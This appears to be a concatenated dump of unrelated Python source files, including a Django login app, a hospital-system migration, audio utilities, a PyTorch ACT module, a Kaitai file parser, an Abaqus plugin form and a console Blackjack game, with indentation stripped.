program_desc = 'Mash MinHash search your sequences against a NCBI RefSeq genomes database'
|
991,259 | df61aab31369626be0953847387075e8e1b70950 | from django import http
from django.http.response import HttpResponse
from django.shortcuts import render,redirect
from django.contrib.auth.models import User
from myapplication.models import Singup
from myapplication.forms import SignUpForm,LoginForm,UpdateForm
from django.contrib import messages
from django.contrib.auth import login,logout,authenticate
# Create your views here.
def signup(request):
if not request.user.is_authenticated:
if request.method=='POST':
fm=SignUpForm(request.POST)
if fm.is_valid():
fm.save()
messages.success(request,'Your account has been secussfully created')
return redirect('/')
else:
redirect('/dashboard/')
def user_login(request):
if not request.user.is_authenticated:
if request.method=='POST':
fm=LoginForm(request=request,data=request.POST)
if fm.is_valid():
username=fm.cleaned_data['username']
password=fm.cleaned_data['password']
user=authenticate(username=username,password=password)
if user is not None:
login(request,user)
messages.success(request,'You have successfully login')
return redirect('/dashboard/')
else:
fm=LoginForm()
signup=SignUpForm()
else:
return redirect('/dashboard/')
return render(request,'myapplication/index.html',{'form':fm,'signupform':signup})
def dashboard(request):
fm=UpdateForm()
alluser=Singup.objects.all()
return render(request,'myapplication/dashboard.html',{'user':alluser,'form':fm})
def userupdate(request,id):
if request.method=='POST':
obj=Singup.objects.get(pk=id)
fm=UpdateForm(request.POST,instance=obj)
if fm.is_valid():
fm.save()
messages.success(request,'Your record has been secussfully updated')
return redirect('/dashboard/')
else:
obj=Singup.objects.get(pk=id)
fm=UpdateForm(instance=obj)
return render(request,'myapplication/update.html',{'form':fm})
def user_logout(request):
logout(request)
return redirect('/')
def user_delete(request,id):
if request.method=='POST':
obj=Singup.objects.get(pk=id)
obj.delete()
return redirect('/dashboard/')
|
991,260 | 8ab0ecb085cc7b0e9ffb8d6ccb52e0cd76730a71 | a=input().split(",")
for i in range(len(a)):
a[i]=int(a[i])
a.sort()
print(a[0]) |
991,261 | 9eb467a0786bb961de70456690c32e44e4a17e9a | # Generated by Django 3.1.7 on 2021-03-19 14:37
from django.conf import settings
import django.contrib.auth.models
import django.contrib.auth.validators
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
import encrypted_fields.fields
class Migration(migrations.Migration):
initial = True
dependencies = [
('auth', '0012_alter_user_first_name_max_length'),
]
operations = [
migrations.CreateModel(
name='User',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('password', models.CharField(max_length=128, verbose_name='password')),
('last_login', models.DateTimeField(blank=True, null=True, verbose_name='last login')),
('is_superuser', models.BooleanField(default=False, help_text='Designates that this user has all permissions without explicitly assigning them.', verbose_name='superuser status')),
('username', models.CharField(error_messages={'unique': 'A user with that username already exists.'}, help_text='Required. 150 characters or fewer. Letters, digits and @/./+/-/_ only.', max_length=150, unique=True, validators=[django.contrib.auth.validators.UnicodeUsernameValidator()], verbose_name='username')),
('first_name', models.CharField(blank=True, max_length=150, verbose_name='first name')),
('last_name', models.CharField(blank=True, max_length=150, verbose_name='last name')),
('is_staff', models.BooleanField(default=False, help_text='Designates whether the user can log into this admin site.', verbose_name='staff status')),
('is_active', models.BooleanField(default=True, help_text='Designates whether this user should be treated as active. Unselect this instead of deleting accounts.', verbose_name='active')),
('date_joined', models.DateTimeField(default=django.utils.timezone.now, verbose_name='date joined')),
('email', models.EmailField(max_length=254, unique=True)),
('phone', encrypted_fields.fields.EncryptedCharField(blank=True, max_length=20, null=True)),
('groups', models.ManyToManyField(blank=True, help_text='The groups this user belongs to. A user will get all permissions granted to each of their groups.', related_name='user_set', related_query_name='user', to='auth.Group', verbose_name='groups')),
],
options={
'verbose_name': 'user',
'verbose_name_plural': 'users',
'abstract': False,
},
managers=[
('objects', django.contrib.auth.models.UserManager()),
],
),
migrations.CreateModel(
name='Department',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=50)),
('created_at', models.DateTimeField(auto_now_add=True)),
('updated_at', models.DateTimeField(auto_now=True)),
],
),
migrations.CreateModel(
name='Nurse',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=50)),
],
),
migrations.CreateModel(
name='Status',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=30)),
],
options={
'verbose_name': 'status',
'verbose_name_plural': 'statuses',
},
),
migrations.CreateModel(
name='Doctor',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('email', models.EmailField(max_length=254, unique=True)),
('phone', encrypted_fields.fields.EncryptedCharField(max_length=20)),
('photo', models.ImageField(blank=True, null=True, upload_to='photos/%Y/%m/%d/')),
('created_at', models.DateTimeField(auto_now_add=True)),
('updated_at', models.DateTimeField(auto_now=True)),
('speciality', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='system.department')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='Appointment',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(blank=True, max_length=50, null=True)),
('address', encrypted_fields.fields.EncryptedCharField(max_length=20)),
('email', encrypted_fields.fields.EncryptedEmailField(max_length=254)),
('age', models.IntegerField()),
('phone', encrypted_fields.fields.EncryptedCharField(max_length=20)),
('gender', encrypted_fields.fields.EncryptedCharField(choices=[('Male', 'Male'), ('Female', 'Female')], max_length=20)),
('date', models.DateTimeField()),
('created_at', models.DateTimeField(auto_now_add=True)),
('updated_at', models.DateTimeField(auto_now=True)),
('department', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='system.department')),
('doctor', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='system.doctor')),
('nurse', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='system.nurse')),
('status', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='system.status')),
],
),
migrations.AddField(
model_name='user',
name='speciality',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='system.department'),
),
migrations.AddField(
model_name='user',
name='user_permissions',
field=models.ManyToManyField(blank=True, help_text='Specific permissions for this user.', related_name='user_set', related_query_name='user', to='auth.Permission', verbose_name='user permissions'),
),
]
|
991,262 | 3098b1140e29f77e1308f97680f2eda709e67441 | #Python for Beginner 제4장_06
#연산자 우선순위
#연산자가 여러 개 동시에 나오면 어떤 것을 먼저 처리할지 고려
우선순위 연산자 의미
===================================================================
1 () [] {} 괄호, 리스트, 딕셔너리, 세트 등
2 ** 지수
3 + - ~ 단항 연산자 # 덧셈 뺄셈이 아닌 숫자나 변수앞에 붙는 플러스, 마이너스 부호를 의미
4 * / % // 산술 연산자
5 + - 산술 연산자
6 << >> 비트 시프트 연산자
7 & 비트 논리곱
8 ^ 비트 배타적 논리합
9 | 비트 논리합
10 < > >= <= 관계 연산자
11 == != 동등 연산자
12 = %= /= //= -= += *= **= 대입 연산자
13 not 논리 연산자
14 and 논리 연산자
15 or 논리 연산자
16 if~else 비교식
|
991,263 | b9a8fc64090f7c2f4e553beea28a92a7e34ecd9c | n = int(input())
arr = [int(x) for x in input().split()]
sum = 0
for i in arr:
sum ^= i
print(sum)
|
991,264 | a12775024d8eb003e159c316fea70912e7fb5db5 | import itertools
import os
from pydub import AudioSegment
from utils import pairwise
def concat_audio_files(audio_files, out_file):
_, out_file_ext = os.path.splitext(out_file)
audio_segments = (AudioSegment.from_file(file) for file in audio_files)
sum(audio_segments).export(out_file, format=out_file_ext[1:])
def cut_audio_segment(audio_segment, intervals):
for interval in intervals:
yield audio_segment[interval[0]:interval[1]]
def cut_audio_file(audio_file, intervals):
audio_file_name, audio_file_extension = os.path.splitext(audio_file)
audio_segment = AudioSegment.from_file(audio_file)
slices = cut_audio_segment(audio_segment, intervals)
for idx, current in enumerate(slices, 1):
current.export(f'{audio_file_name}_{idx}{audio_file_extension}', format=audio_file_extension[1:])
def break_up_audio_file_by_timestamps(audio_file, timestamps):
audio_file_name, audio_file_ext = os.path.splitext(audio_file)
audio_segment = AudioSegment.from_file(audio_file)
intervals = pairwise(itertools.chain((0,), timestamps, (len(audio_segment),)))
slices = cut_audio_segment(audio_segment, intervals)
for idx, current in enumerate(slices, 1):
current.export(f'{audio_file_name}_{idx}{audio_file_ext}', format=audio_file_ext[1:])
def reverse_audio_file(audio_file, out_file):
_, out_file_ext = os.path.splitext(out_file)
AudioSegment.from_file(audio_file).reverse().export(out_file, format=out_file_ext[1:])
|
991,265 | 270ed5bc348c5d45ff82516423c468d974585558 | import torch
from torch import nn
### CONVERTED FROM https://github.com/tensorflow/tensor2tensor/blob/master/tensor2tensor/models/research/universal_transformer_util.py#L1062
class ACT_basic(nn.Module):
def __init__(self,hidden_size):
super(ACT_basic, self).__init__()
self.sigma = nn.Sigmoid()
self.p = nn.Linear(hidden_size,1)
self.p.bias.data.fill_(1)
self.threshold = 1 - 0.1
def forward(self, state, inputs, fn, time_enc, pos_enc, max_hop, encoder_output=None):
# init_hdd
## [B, S]
halting_probability = torch.zeros(inputs.shape[0],inputs.shape[1]).cuda()
## [B, S
remainders = torch.zeros(inputs.shape[0],inputs.shape[1]).cuda()
## [B, S]
n_updates = torch.zeros(inputs.shape[0],inputs.shape[1]).cuda()
## [B, S, HDD]
previous_state = torch.zeros_like(inputs).cuda()
step = 0
# for l in range(self.num_layers):
while( ((halting_probability<self.threshold) & (n_updates < max_hop)).byte().any()):
# Add timing signal
state = state + time_enc[:, :inputs.shape[1], :].type_as(inputs.data)
state = state + pos_enc[:, step, :].unsqueeze(1).repeat(1,inputs.shape[1],1).type_as(inputs.data)
p = self.sigma(self.p(state)).squeeze(-1)
# Mask for inputs which have not halted yet
still_running = (halting_probability < 1.0).float()
# Mask of inputs which halted at this step
new_halted = (halting_probability + p * still_running > self.threshold).float() * still_running
# Mask of inputs which haven't halted, and didn't halt this step
still_running = (halting_probability + p * still_running <= self.threshold).float() * still_running
# Add the halting probability for this step to the halting
# probabilities for those input which haven't halted yet
halting_probability = halting_probability + p * still_running
# Compute remainders for the inputs which halted at this step
remainders = remainders + new_halted * (1 - halting_probability)
# Add the remainders to those inputs which halted at this step
halting_probability = halting_probability + new_halted * remainders
# Increment n_updates for all inputs which are still running
n_updates = n_updates + still_running + new_halted
# Compute the weight to be applied to the new state and output
# 0 when the input has already halted
# p when the input hasn't halted yet
# the remainders when it halted this step
update_weights = p * still_running + new_halted * remainders
if(encoder_output):
state, _ = fn((state,encoder_output))
else:
# apply transformation on the state
state = fn(state)
# update running part in the weighted state and keep the rest
previous_state = ((state * update_weights.unsqueeze(-1)) + (previous_state * (1 - update_weights.unsqueeze(-1))))
## previous_state is actually the new_state at end of hte loop
## to save a line I assigned to previous_state so in the next
## iteration is correct. Notice that indeed we return previous_state
step+=1
return previous_state, (remainders,n_updates) |
991,266 | c80983ea0b8c9cec10ad6f2b499ea3c36b8cb596 | # This is a generated file! Please edit source .ksy file and use kaitai-struct-compiler to rebuild
from pkg_resources import parse_version
import kaitaistruct
from kaitaistruct import KaitaiStruct, KaitaiStream, BytesIO
import collections
if parse_version(kaitaistruct.__version__) < parse_version('0.9'):
raise Exception("Incompatible Kaitai Struct Python API: 0.9 or later is required, but you have %s" % (kaitaistruct.__version__))
class Dune2Pak(KaitaiStruct):
SEQ_FIELDS = ["dir"]
def __init__(self, _io, _parent=None, _root=None):
self._io = _io
self._parent = _parent
self._root = _root if _root else self
self._debug = collections.defaultdict(dict)
def _read(self):
self._debug['dir']['start'] = self._io.pos()
self._raw_dir = self._io.read_bytes(self.dir_size)
_io__raw_dir = KaitaiStream(BytesIO(self._raw_dir))
self.dir = Dune2Pak.Files(_io__raw_dir, self, self._root)
self.dir._read()
self._debug['dir']['end'] = self._io.pos()
class Files(KaitaiStruct):
SEQ_FIELDS = ["files"]
def __init__(self, _io, _parent=None, _root=None):
self._io = _io
self._parent = _parent
self._root = _root if _root else self
self._debug = collections.defaultdict(dict)
def _read(self):
self._debug['files']['start'] = self._io.pos()
self.files = []
i = 0
while not self._io.is_eof():
if not 'arr' in self._debug['files']:
self._debug['files']['arr'] = []
self._debug['files']['arr'].append({'start': self._io.pos()})
_t_files = Dune2Pak.File(i, self._io, self, self._root)
_t_files._read()
self.files.append(_t_files)
self._debug['files']['arr'][len(self.files) - 1]['end'] = self._io.pos()
i += 1
self._debug['files']['end'] = self._io.pos()
class File(KaitaiStruct):
SEQ_FIELDS = ["ofs", "file_name"]
def __init__(self, idx, _io, _parent=None, _root=None):
self._io = _io
self._parent = _parent
self._root = _root if _root else self
self.idx = idx
self._debug = collections.defaultdict(dict)
def _read(self):
self._debug['ofs']['start'] = self._io.pos()
self.ofs = self._io.read_u4le()
self._debug['ofs']['end'] = self._io.pos()
if self.ofs != 0:
self._debug['file_name']['start'] = self._io.pos()
self.file_name = (self._io.read_bytes_term(0, False, True, True)).decode(u"ASCII")
self._debug['file_name']['end'] = self._io.pos()
@property
def next_ofs0(self):
if hasattr(self, '_m_next_ofs0'):
return self._m_next_ofs0 if hasattr(self, '_m_next_ofs0') else None
if self.ofs != 0:
self._m_next_ofs0 = self._root.dir.files[(self.idx + 1)].ofs
return self._m_next_ofs0 if hasattr(self, '_m_next_ofs0') else None
@property
def next_ofs(self):
if hasattr(self, '_m_next_ofs'):
return self._m_next_ofs if hasattr(self, '_m_next_ofs') else None
if self.ofs != 0:
self._m_next_ofs = (self._root._io.size() if self.next_ofs0 == 0 else self.next_ofs0)
return self._m_next_ofs if hasattr(self, '_m_next_ofs') else None
@property
def body(self):
if hasattr(self, '_m_body'):
return self._m_body if hasattr(self, '_m_body') else None
if self.ofs != 0:
io = self._root._io
_pos = io.pos()
io.seek(self.ofs)
self._debug['_m_body']['start'] = io.pos()
self._m_body = io.read_bytes((self.next_ofs - self.ofs))
self._debug['_m_body']['end'] = io.pos()
io.seek(_pos)
return self._m_body if hasattr(self, '_m_body') else None
@property
def dir_size(self):
if hasattr(self, '_m_dir_size'):
return self._m_dir_size if hasattr(self, '_m_dir_size') else None
_pos = self._io.pos()
self._io.seek(0)
self._debug['_m_dir_size']['start'] = self._io.pos()
self._m_dir_size = self._io.read_u4le()
self._debug['_m_dir_size']['end'] = self._io.pos()
self._io.seek(_pos)
return self._m_dir_size if hasattr(self, '_m_dir_size') else None
|
991,267 | f1eacbe9ce5d936928bda97704e16584ef784392 | from Framework.Genetics.LocationBuildController import LocationBuildController
from Framework.RunController import RunController
from NQueens.LocationCreators.NQueensLocationBuilderParameters import NQueensLocationBuilderParameters
from NQueens.NQueensDemeBuilder import NQueensDemeBuilder
from NQueens.NQueensHistoricalLocationBuilder import NQueensHistoricalLocationBuilder
from NQueens.NQueensLocationBuildController import NQueensLocationBuildController
from NQueens.NQueensLocationStore import NQueensLocationStore
class NQueensRunController(RunController):
def __init__(self, parameters):
super(NQueensRunController, self).__init__(parameters, NQueensLocationStore(parameters))
self.parameters = parameters
self.foundResults = []
self.demes = []
self.locationBuildController = LocationBuildController(parameters, parameters.location_builders) #NQueensLocationBuildController(parameters, parameters.location_builders)
self.demeBuilder = NQueensDemeBuilder(parameters, self.locationBuildController, self)
self.demes = self.initialiseDemes(parameters)
self.deme_locations = {}
def update(self, problem):
super(NQueensRunController, self).update(problem)
for deme in self.demes:
deme.evaluate(problem)
deme.update()
if len(deme.members) == 0:
self.demes.remove(deme)
self.insertNewDeme()
def insertNewDeme(self):
build_params = NQueensLocationBuilderParameters(self.location_store)
newDeme = self.demeBuilder.build_with_location(build_params)
self.demes.append(newDeme)
def initialiseDemes(self, parameters):
return [self.demeBuilder.build() for x in range(0, parameters.total_demes)] |
991,268 | 7668898a1e0536a9f13d25acfa8cf9278ff55cf1 | # Question 15:write a program that ask the user to enter two numbers ,x and y,and computes |x-y|/x+y.
x = float(input('Enter x: '))
y = float(input('Enter y: '))
print(abs(x-y)/x+y) |
991,269 | fd2345dfb339589f2cc3022acd167c47e789dd1f | from abaqusGui import *
from abaqusConstants import ALL
import osutils, os
###########################################################################
# Class definition
###########################################################################
class _rsgTmp322_Form(AFXForm):
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
def __init__(self, owner):
# Construct the base class.
#
AFXForm.__init__(self, owner)
self.radioButtonGroups = {}
self.cmd = AFXGuiCommand(mode=self, method='Fibre_insert',
objectName='Fibre_insert', registerQuery=False)
pickedDefault = ''
self.uel_modeKw = AFXBoolKeyword(self.cmd, 'uel_mode', AFXBoolKeyword.TRUE_FALSE, True, False)
self.modelNameKw = AFXStringKeyword(self.cmd, 'modelName', True)
self.partNameKw = AFXStringKeyword(self.cmd, 'partName', True)
self.variableKw = AFXObjectKeyword(self.cmd, 'variable', TRUE, pickedDefault)
self.concreteKw = AFXStringKeyword(self.cmd, 'concrete', True, 'C25')
self.thicknessKw = AFXFloatKeyword(self.cmd, 'thickness', True, 50)
self.diameterKw = AFXStringKeyword(self.cmd, 'diameter', True, '0.2')
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
def getFirstDialog(self):
import _rsgTmp322_DB
return _rsgTmp322_DB._rsgTmp322_DB(self)
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
def doCustomChecks(self):
# Try to set the appropriate radio button on. If the user did
# not specify any buttons to be on, do nothing.
#
for kw1,kw2,d in self.radioButtonGroups.values():
try:
value = d[ kw1.getValue() ]
kw2.setValue(value)
except:
pass
return True
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
def deactivate(self):
try:
osutils.remove(os.path.join('c:\\Users\\Hasee\\abaqus_plugins\\Fibre_insert', '_rsgTmp322_DB.py'), force=True )
osutils.remove(os.path.join('c:\\Users\\Hasee\\abaqus_plugins\\Fibre_insert', '_rsgTmp322_DB.pyc'), force=True )
except:
pass
try:
osutils.remove(os.path.join('c:\\Users\\Hasee\\abaqus_plugins\\Fibre_insert', '_rsgTmp322_Form.py'), force=True )
osutils.remove(os.path.join('c:\\Users\\Hasee\\abaqus_plugins\\Fibre_insert', '_rsgTmp322_Form.pyc'), force=True )
except:
pass
AFXForm.deactivate(self)
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
def getCommandString(self):
cmds = 'import Fibre_insert\n'
cmds += AFXForm.getCommandString(self)
return cmds
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
def okToCancel(self):
# No need to close the dialog when a file operation (such
# as New or Open) or model change is executed.
#
return False
|
991,270 | c49248531904d59e685fe5d1242556b4e18d06c1 | from turtle import *
pidge = Turtle()
pidge.color('orange')
pidge.pensize(5)
pidge.speed(5)
pidge.shape('turtle')
pidge.turtlesize(5,5,5)
for x in range(4):
pidge.forward(100)
pidge.left(90)
mainloop()
|
991,271 | 2bd64565505c7e80a00259e87085949275143037 | # Generated by Django 3.1.6 on 2021-02-19 04:54
from django.db import migrations, models
import djmoney.models.fields
class Migration(migrations.Migration):
dependencies = [
('order', '0004_auto_20210218_2132'),
]
operations = [
migrations.AddField(
model_name='order',
name='order_id',
field=models.UUIDField(blank=True, null=True),
),
migrations.AlterField(
model_name='order',
name='amount',
field=djmoney.models.fields.MoneyField(decimal_places=2, default_currency='TMT', max_digits=14, verbose_name='Amount'),
),
]
|
991,272 | bac2e4af3aafe7f2bc6488dbe4a0b09cf18cb310 | # A full-feature game of Blackjack
from random import shuffle
from time import sleep
from os import system
class Card():
"""
base card class. Allows us to create any cards to put them in the deck later on.
"""
suits = ["spades", "diamonds", "hearts", "clubs"]
values = [None, None, "2", "3", "4", "5", "6", "7", "8", "9", "10", "Jack", "Queen", "King", "Ace"]
def __init__(self, value, suit):
self.value = value
self.suit = suit
def __repr__(self):
return self.values[self.value] + " of " + self.suits[self.suit]
def __add__(self, other):
return [self, other]
class Deck():
"""
basic deck class. Filled with 52 unique cards upon initialization.
remove_card method serves as a draw-a-card function
"""
def __init__(self): # create a list, fill it with cards, shuffle the list
self.cards = []
for i in range(4):
for j in range(2, 15):
self.cards.append(Card(j, i))
shuffle(self.cards)
def remove_card(self): # deal a card
if len(self.cards) == 0:
return
return self.cards.pop()
class Player():
def __init__(self, name):
self.name = name
self.bankroll = 1000
self.hand = []
self.hand2 = []
self.final_hand_val = 0
self.final_hand2_val = 0
self.blackjack = False
self.split = False
self.double_down = False
self.went_split = False
self.went_double = False
self.display_hand_val = []
def hand_value_check(self, hand):
"""
Calculates hand player's hand value. Returns list of values, starting with largest one. Accounts for aces being
either 1 or 11.
:param hand:
:return:
"""
hand_value = 0
ace = 0
result = []
a = 0
for card in hand: # calculate value of a hand
if card.value < 10:
a = card.value
elif card.value in range(10, 14):
a = 10
elif card.value == 14: # keep track of Aces that may be counted both as 11 and as 1
a = 11
ace += 1
hand_value += a
if ace > 0: # if hand had aces, return all possible hand values
for i in range(0, ace + 1):
result.append(hand_value)
hand_value -= 10
self.display_hand_val = result
return result
else:
result.append(hand_value)
self.display_hand_val = result
return result
class Dealer():
def __init__(self):
self.name = Dealer
self.bankroll = 1000000
self.hand = []
self.blackjack = False
self.final_hand_value = 0
self.display_hand_val = []
def hand_value_check(self, hand):
"""
Returns value of Dealer's hand. Unlike similar function for player, Dealer's Aces are always accounted for as
11's, hence final return list will contain only 1 value.
:param hand:
:return:
"""
hand_value = 0
result = []
a = 0
for card in hand: # calculate value of a hand
if card.value < 10:
a = card.value
elif card.value in range(10, 14):
a = 10
elif card.value == 14: # keep track of Aces that may be counted both as 11 and as 1
a = 11
hand_value += a
result.append(hand_value)
self.display_hand_val = result
return result
class Bank():
def __init__(self):
self.player1_bet = 0
self.player1_bet2 = 0
def make_bet(self):
while True:
a = input("Enter the bet amount:\n")
try:
bet = int(a)
break
except:
print("Invalid bet amount. Try again.")
bj.player1.bankroll -= bet
self.player1_bet = bet
class Table():
def __init__(self):
self.stage = "start" # draw different stages of the game
self.dealer_phase = False
def draw_table(self, time=0.75): # draw game state
system('cls')
print("^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^")
print(f"Dealer: {bj.dealer.bankroll}$".center(60))
if self.dealer_phase is True:
print(f"{', '.join(str(c) for c in bj.dealer.hand)}".center(60))
elif self.stage == "natural BJ":
print(f"{bj.dealer.hand[0]}, {bj.dealer.hand[1]}".center(60))
elif self.stage == "start":
print(f"{bj.dealer.hand[0]} XX".center(60))
print("\n")
if len(bj.dealer.display_hand_val) > 0 and self.dealer_phase is True:
print(f"{max(bj.dealer.display_hand_val)}\n".center(60))
else:
print("\n")
if self.stage == "split":
print(f"{bj.bank.player1_bet}".center(30), f"{bj.bank.player1_bet2}\n".center(30))
else:
print(f"{bj.bank.player1_bet}$\n".center(60))
if self.stage == "BJ!":
print("BLACK JACK!\n".center(60))
elif len(bj.player1.display_hand_val) > 0:
if len(bj.player1.display_hand_val) > 1: # cut 22+ display values only if there are other values to display
temp = [x for x in bj.player1.display_hand_val if x <= 21] # if both remaining values > 21, leave smaller one
if len(temp) == 0:
bj.player1.display_hand_val = [min(bj.player1.display_hand_val)]
else:
bj.player1.display_hand_val = [x for x in bj.player1.display_hand_val if x <= 21]
print(f"{max(bj.player1.display_hand_val)}\n".center(60))
else:
print("\n")
if self.stage == "split":
print(f"{', '.join(str(c) for c in bj.player1.hand)}".center(30), "||", f"{', '.join(str(c) for c in bj.player1.hand2)}".center(30))
else:
print(f"{', '.join(str(c) for c in bj.player1.hand)}".center(60))
print(f"{bj.player1.name}: {bj.player1.bankroll}$".center(60))
print("^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^")
sleep(time)
class Game():
def __init__(self):
name1 = input("Player1 name is: ")
self.player1 = Player(name1)
self.dealer = Dealer()
self.deck = Deck()
self.bank = Bank()
self.table = Table()
print(f"{self.player1.name}, welcome to a game of BlackJack!")
def reset(self):
self.deck = Deck()
self.bank = Bank()
self.table = Table()
self.player1.hand = []
self.player1.hand2 = []
self.player1.final_hand_val = 0
self.player1.final_hand2_val = 0
self.player1.blackjack = False
self.player1.split = False
self.player1.double_down = False
self.player1.went_split = False
self.player1.went_double = False
self.dealer.hand = None
self.dealer.blackjack = False
self.dealer.final_hand_value = 0
def play_game(self):
"""
Main game function.
:return:
"""
self.reset()
shuffle(bj.deck.cards) # shuffle cards
# BETTING PHASE
bj.bank.make_bet()
# INITIAL CARD DEALING PHASE
bj.player1.hand = bj.deck.remove_card() # Deal cards to player and dealer
#c1 = Card(10, 1) debug option -> deal player specific cards
#c2 = Card(3, 3)
#bj.player1.hand = [c1, c2]
bj.dealer.hand = bj.deck.remove_card()
bj.player1.hand += bj.deck.remove_card()
bj.dealer.hand += bj.deck.remove_card()
# PRE PLAYER-CHOICE PHASE
player_hand_val = bj.player1.hand_value_check(bj.player1.hand) # check for natural blackjacks
dealer_hand_val = bj.dealer.hand_value_check(bj.dealer.hand)
bj.table.draw_table(1)
for i in player_hand_val:
if i == 21:
bj.player1.blackjack = True
bj.table.stage = "BJ!"
bj.table.draw_table(1)
elif i == 9 or i == 10 or i == 11: # check for double down option
bj.player1.double_down = True
if bj.player1.hand[0].value == bj.player1.hand[1].value: # check for split pair option
bj.player1.split = True
for i in dealer_hand_val:
if i == 21:
bj.dealer.blackjack = True
if bj.player1.blackjack is True: # pay for natural blackjack outcomes
bj.table.stage = "natural BJ"
bj.table.draw_table()
if bj.dealer.blackjack is False:
bj.player1.bankroll += bj.bank.player1_bet * 2.5
bj.dealer.bankroll -= bj.bank.player1_bet * 1.5
bj.table.draw_table(3)
return
else:
bj.player1.bankroll += bj.bank.player1_bet
bj.table.draw_table(3)
return
# PLAYER CHOICE PHASE
def ask_user():
"""
General function for user choice prompt. Checks for valid available player choices (hit/stand available
always, split and DD are turned by respective flags), asks user for input, keeps asking till input is valid.
:return:
"""
while True:
if bj.player1.double_down is True and bj.player1.split is True and bj.player1.went_split is False:
p_choice = input("Hit, Stand, Double Down or Split?\n")
if p_choice != "hit" and p_choice != "stand" and p_choice != "dd" and p_choice != "double" and p_choice != "double down" and p_choice != "split":
print("Wrong input.\n")
continue
else:
return p_choice
elif bj.player1.split is True and bj.player1.went_split is False: # various input prompts depending on available player choices
p_choice = input("Hit, Stand or Split?\n")
if p_choice != "hit" and p_choice != "stand" and p_choice != "split":
print("Wrong input.\n")
continue
else:
return p_choice
elif bj.player1.double_down is True:
p_choice = input("Hit, Stand or Double Down?\n")
if p_choice != "hit" and p_choice != "stand" and p_choice != "dd" and p_choice != "double" and p_choice != "double down":
print("Wrong input.\n")
continue
else:
return p_choice
else:
p_choice = input("Hit or Stand?\n")
if p_choice != "hit" and p_choice != "stand":
print("Wrong input.\n")
continue
else:
return p_choice
def double_down(hand=bj.player1.hand):
"""
Double Down function. Takes into account possible second hand if splitting choice was made. Doubles player's
bet, deals 1 card to current hand, calculates hand value and assigns it to respective final hand value.
:param hand:
:return:
"""
if hand == bj.player1.hand:
bj.player1.bankroll -= bj.bank.player1_bet
bj.bank.player1_bet += bj.bank.player1_bet
else:
bj.player1.bankroll -= bj.bank.player1_bet2
bj.bank.player1_bet2 += bj.bank.player1_bet2
if hand == bj.player1.hand:
bj.player1.hand.append(bj.deck.remove_card())
bj.player1.final_hand_val = bj.player1.hand_value_check(bj.player1.hand)
else:
bj.player1.hand2.append(bj.deck.remove_card())
bj.player1.final_hand2_val = bj.player1.hand_value_check(bj.player1.hand2)
bj.player1.went_double = True
def hit(hand=bj.player1.hand):
"""
Simply deals additional card to current hand.
:param hand:
:return:
"""
hand.append(bj.deck.remove_card())
def stand(hand=bj.player1.hand):
"""
Calculates current hand values, discards ones exceeding 21, then chooses largest of remaining values and
assigns it to player final hand value
:param hand:
:return:
"""
phv = bj.player1.hand_value_check(hand) # check player hand value
phv = [x for x in phv if x <= 21]
if hand == bj.player1.hand:
if len(phv) > 0:
bj.player1.final_hand_val = max(phv)
else:
bj.player1.final_hand_val = "bust"
else:
if len(phv) > 0:
bj.player1.final_hand2_val = max(phv)
else:
bj.player1.final_hand2_val = "bust"
def check_for_bust_or_bj(hand=bj.player1.hand):
"""
Calculates current hand's values, discards ones over 21. If no values remain -> assigns "bust" to final hand
value. If "21" is among current hand's values -> assigns 21 as final hand value.
:param hand:
:return:
"""
phv = bj.player1.hand_value_check(hand) # check player hand value
phv = [x for x in phv if x <= 21] # remove all hand values that exceed 21
if len(phv) == 0: # if no values under 21 are available -> bust
if hand == bj.player1.hand:
bj.player1.final_hand_val = "bust"
return
else:
bj.player1.final_hand2_val = "bust"
return
elif 21 in phv: # if 21 is among values -> blackjack
if hand == bj.player1.hand:
bj.player1.final_hand_val = 21
return
else:
bj.player1.final_hand2_val = 21
return
global p_choice
p_choice = ask_user()
if p_choice == "split": # branch out hands if split was available and chosen by player
bj.player1.hand2.append(bj.player1.hand.pop()) #create second hand for player1
bj.player1.hand.append(bj.player1.hand.pop())
bj.player1.bankroll -= bj.bank.player1_bet #make a bet on a second hand
bj.bank.player1_bet2 = bj.bank.player1_bet
bj.table.stage = "split"
bj.table.draw_table(0.33)
split_aces = False
bj.player1.went_split = True
bj.player1.double_down = False # turn off possible DD flag from initial draw, check for DD again
